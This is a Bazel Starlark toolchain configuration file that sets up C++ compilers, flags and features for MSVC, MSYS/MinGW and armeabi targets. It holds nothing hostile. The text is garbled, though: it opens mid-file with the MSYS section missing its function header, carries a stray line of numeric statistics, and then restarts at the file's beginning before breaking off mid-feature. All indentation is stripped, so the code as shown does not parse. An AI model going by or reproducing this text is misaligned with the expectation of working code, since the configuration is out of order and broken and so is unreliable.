supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [supports_dynamic_linker_feature, supports_pic_feature]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
]
artifact_name_patterns = []
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "/bin/false"),
tool_path(name = "compat-ld", path = "/bin/false"),
tool_path(name = "cpp", path = "/bin/false"),
tool_path(name = "dwp", path = "/bin/false"),
tool_path(name = "gcc", path = "/bin/false"),
tool_path(name = "gcov", path = "/bin/false"),
tool_path(name = "ld", path = "/bin/false"),
tool_path(name = "nm", path = "/bin/false"),
tool_path(name = "objcopy", path = "/bin/false"),
tool_path(name = "objdump", path = "/bin/false"),
tool_path(name = "strip", path = "/bin/false"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _impl(ctx):
if ctx.attr.cpu == "armeabi-v7a":
return _armeabi_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "msvc-cl":
return _windows_msvc_impl(ctx)
elif ctx.attr.cpu == "x64_windows" and ctx.attr.compiler == "mingw-gcc":
return _windows_msys_mingw_impl(ctx)
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/usr/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/usr/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/usr/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/usr/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/usr/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/usr/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/usr/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/usr/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/usr/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/usr/bin/strip"),
]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
action_configs = []
compile_flags = [
]
dbg_compile_flags = [
]
opt_compile_flags = [
]
cxx_flags = [
"-std=gnu++0x",
]
link_flags = [
"-lstdc++",
]
opt_link_flags = [
]
unfiltered_compile_flags = [
]
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/usr/bin"),
],
),
],
)
windows_features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
]
supports_pic_feature = feature(
name = "supports_pic",
enabled = True,
)
supports_start_end_lib_feature = feature(
name = "supports_start_end_lib",
enabled = True,
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = compile_flags)] if compile_flags else []),
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = dbg_compile_flags)] if dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = opt_compile_flags)] if opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = cxx_flags)] if cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = link_flags)] if link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = opt_link_flags)] if opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
sysroot_feature = feature(
name = "sysroot",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
expand_if_available = "sysroot",
),
],
),
],
)
fdo_optimize_feature = feature(
name = "fdo_optimize",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"-fprofile-use=%{fdo_profile_path}",
"-fprofile-correction",
],
expand_if_available = "fdo_profile_path",
),
],
),
],
provides = ["profile"],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
user_compile_flags_feature = feature(
name = "user_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = unfiltered_compile_flags)] if unfiltered_compile_flags else []),
),
],
)
features = windows_features + [
supports_pic_feature,
default_compile_flags_feature,
default_link_flags_feature,
fdo_optimize_feature,
supports_dynamic_linker_feature,
dbg_feature,
opt_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
]
artifact_name_patterns = [
artifact_name_pattern(category_name = "executable", prefix = "", extension = ".exe"),
]
make_variables = []
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = "msys_x64",
host_system_name = "local",
target_system_name = "local",
target_cpu = "x64_windows",
target_libc = "msys",
compiler = "msys-gcc",
abi_version = "local",
abi_libc_version = "local",
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = "",
cc_target_os = None,
)
cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"cpu": attr.string(mandatory = True),
"compiler": attr.string(),
},
provides = [CcToolchainConfigInfo],
)
| 35.402346
| 384
| 0.519259
|
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"action_config",
"artifact_name_pattern",
"env_entry",
"env_set",
"feature",
"feature_set",
"flag_group",
"flag_set",
"make_variable",
"tool",
"tool_path",
"variable_with_value",
"with_feature_set",
)
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
all_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
ACTION_NAMES.lto_backend,
]
all_cpp_compile_actions = [
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
]
preprocessor_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.clif_match,
]
codegen_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
]
all_link_actions = [
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
def _windows_msvc_impl(ctx):
toolchain_identifier = "msvc_x64"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "msvcrt"
compiler = "msvc-cl"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
cxx_builtin_include_directories = [
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
cpp_link_nodeps_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_nodeps_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_static_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_static_library,
implies = [
"nologo",
"archiver_flags",
"input_param_flags",
"linker_param_file",
"msvc_env",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe")],
)
assemble_action = action_config(
action_name = ACTION_NAMES.assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
preprocess_assemble_action = action_config(
action_name = ACTION_NAMES.preprocess_assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
c_compile_action = action_config(
action_name = ACTION_NAMES.c_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_compile_action = action_config(
action_name = ACTION_NAMES.cpp_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_link_executable_action = action_config(
action_name = ACTION_NAMES.cpp_link_executable,
implies = [
"nologo",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
action_configs = [
assemble_action,
preprocess_assemble_action,
c_compile_action,
cpp_compile_action,
cpp_link_executable_action,
cpp_link_dynamic_library_action,
cpp_link_nodeps_dynamic_library_action,
cpp_link_static_library_action,
]
msvc_link_env_feature = feature(
name = "msvc_link_env",
env_sets = [
env_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
env_entries = [env_entry(key = "LIB", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\LIB\\amd64;C:\\Program Files (x86)\\Windows Kits\\10\\lib\\10.0.10240.0\\ucrt\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\lib\\winv6.3\\um\\x64;")],
),
],
)
shared_flag_feature = feature(
name = "shared_flag",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [flag_group(flags = ["/DLL"])],
),
],
)
determinism_feature = feature(
name = "determinism",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"/wd4117",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
),
],
),
],
)
sysroot_feature = feature(
name = "sysroot",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
iterate_over = "sysroot",
expand_if_available = "sysroot",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{unfiltered_compile_flags}"],
iterate_over = "unfiltered_compile_flags",
expand_if_available = "unfiltered_compile_flags",
),
],
),
],
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
input_param_flags_feature = feature(
name = "input_param_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["/IMPLIB:%{interface_library_output_path}"],
expand_if_available = "interface_library_output_path",
),
],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{libopts}"],
iterate_over = "libopts",
expand_if_available = "libopts",
),
],
),
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
iterate_over = "libraries_to_link",
flag_groups = [
flag_group(
iterate_over = "libraries_to_link.object_files",
flag_groups = [flag_group(flags = ["%{libraries_to_link.object_files}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file_group",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "interface_library",
),
),
flag_group(
flag_groups = [
flag_group(
flags = ["%{libraries_to_link.name}"],
expand_if_false = "libraries_to_link.is_whole_archive",
),
flag_group(
flags = ["/WHOLEARCHIVE:%{libraries_to_link.name}"],
expand_if_true = "libraries_to_link.is_whole_archive",
),
],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "static_library",
),
),
],
expand_if_available = "libraries_to_link",
),
],
),
],
)
fastbuild_feature = feature(
name = "fastbuild",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FASTLINK", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
user_compile_flags_feature = feature(
name = "user_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
archiver_flags_feature = feature(
name = "archiver_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/MACHINE:X64"])],
),
],
)
static_link_msvcrt_feature = feature(name = "static_link_msvcrt")
dynamic_link_msvcrt_debug_feature = feature(
name = "dynamic_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MDd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
dbg_feature = feature(
name = "dbg",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FULL", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
opt_feature = feature(
name = "opt",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/O2"])],
),
],
implies = ["frame_pointer"],
)
supports_interface_shared_libraries_feature = feature(
name = "supports_interface_shared_libraries",
enabled = True,
)
user_link_flags_feature = feature(
name = "user_link_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{user_link_flags}"],
iterate_over = "user_link_flags",
expand_if_available = "user_link_flags",
),
],
),
],
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = [
"/DCOMPILER_MSVC",
"/DNOMINMAX",
"/D_WIN32_WINNT=0x0601",
"/D_CRT_SECURE_NO_DEPRECATE",
"/D_CRT_SECURE_NO_WARNINGS",
"/bigobj",
"/Zm500",
"/EHsc",
"/wd4351",
"/wd4291",
"/wd4250",
"/wd4996",
],
),
],
),
],
)
msvc_compile_env_feature = feature(
name = "msvc_compile_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
],
env_entries = [env_entry(key = "INCLUDE", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE;C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt;")],
),
],
)
preprocessor_defines_feature = feature(
name = "preprocessor_defines",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/D%{preprocessor_defines}"],
iterate_over = "preprocessor_defines",
),
],
),
],
)
generate_pdb_file_feature = feature(
name = "generate_pdb_file",
requires = [
feature_set(features = ["dbg"]),
feature_set(features = ["fastbuild"]),
],
)
output_execpath_flags_feature = feature(
name = "output_execpath_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
dynamic_link_msvcrt_no_debug_feature = feature(
name = "dynamic_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MD"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
disable_assertions_feature = feature(
name = "disable_assertions",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/DNDEBUG"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
has_configured_linker_path_feature = feature(name = "has_configured_linker_path")
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
no_stripping_feature = feature(name = "no_stripping")
linker_param_file_feature = feature(
name = "linker_param_file",
flag_sets = [
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["@%{linker_param_file}"],
expand_if_available = "linker_param_file",
),
],
),
],
)
ignore_noisy_warnings_feature = feature(
name = "ignore_noisy_warnings",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [flag_group(flags = ["/ignore:4221"])],
),
],
)
no_legacy_features_feature = feature(name = "no_legacy_features")
parse_showincludes_feature = feature(
name = "parse_showincludes",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_header_parsing,
],
flag_groups = [flag_group(flags = ["/showIncludes"])],
),
],
)
static_link_msvcrt_no_debug_feature = feature(
name = "static_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MT"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
treat_warnings_as_errors_feature = feature(
name = "treat_warnings_as_errors",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/WX"])],
),
],
)
windows_export_all_symbols_feature = feature(name = "windows_export_all_symbols")
no_windows_export_all_symbols_feature = feature(name = "no_windows_export_all_symbols")
include_paths_feature = feature(
name = "include_paths",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/I%{quote_include_paths}"],
iterate_over = "quote_include_paths",
),
flag_group(
flags = ["/I%{include_paths}"],
iterate_over = "include_paths",
),
flag_group(
flags = ["/I%{system_include_paths}"],
iterate_over = "system_include_paths",
),
],
),
],
)
linkstamps_feature = feature(
name = "linkstamps",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{linkstamp_paths}"],
iterate_over = "linkstamp_paths",
expand_if_available = "linkstamp_paths",
),
],
),
],
)
targets_windows_feature = feature(
name = "targets_windows",
enabled = True,
implies = ["copy_dynamic_libraries_to_binary"],
)
linker_subsystem_flag_feature = feature(
name = "linker_subsystem_flag",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/SUBSYSTEM:CONSOLE"])],
),
],
)
static_link_msvcrt_debug_feature = feature(
name = "static_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MTd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
frame_pointer_feature = feature(
name = "frame_pointer",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Oy-"])],
),
],
)
compiler_output_flags_feature = feature(
name = "compiler_output_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.assemble],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}", "/Zi"],
expand_if_available = "output_file",
expand_if_not_available = "output_assembly_file",
),
],
expand_if_not_available = "output_preprocess_file",
),
],
),
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}"],
expand_if_not_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
